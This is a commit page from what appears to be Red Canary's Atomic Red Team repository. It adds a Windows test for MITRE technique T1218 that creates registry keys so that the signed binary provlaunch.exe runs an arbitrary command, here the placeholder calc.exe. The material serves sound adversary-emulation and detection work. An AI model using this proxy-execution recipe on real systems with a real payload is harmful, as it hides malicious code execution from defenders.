Provlaunch.exe Executes Arbitrary Command via Registry Key (#2546)

Co-authored-by: Carrie Roberts <[email protected]>
redcanaryco · Sep 29, 2023 · 2dc7056 · 2dc7056
1 parent ccdf46f
commit 2dc7056
Showing 1 changed file with 15 additions and 1 deletion.
diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
@@ -349,4 +349,18 @@ atomic_tests:
     cleanup_command: | 
       Remove-Item -Path #{dest_path} -Recurse -Force
     name: powershell
-    elevation_required: true
+    elevation_required: true
+- name: Provlaunch.exe Executes Arbitrary Command via Registry Key
+  description: |
+    Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
+    - https://twitter.com/0gtweet/status/1674399582162153472
+    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
+    Registry keys are deleted after successful execution.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
+      reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
+      c:\windows\system32\provlaunch.exe LOLBin
+    name: command_prompt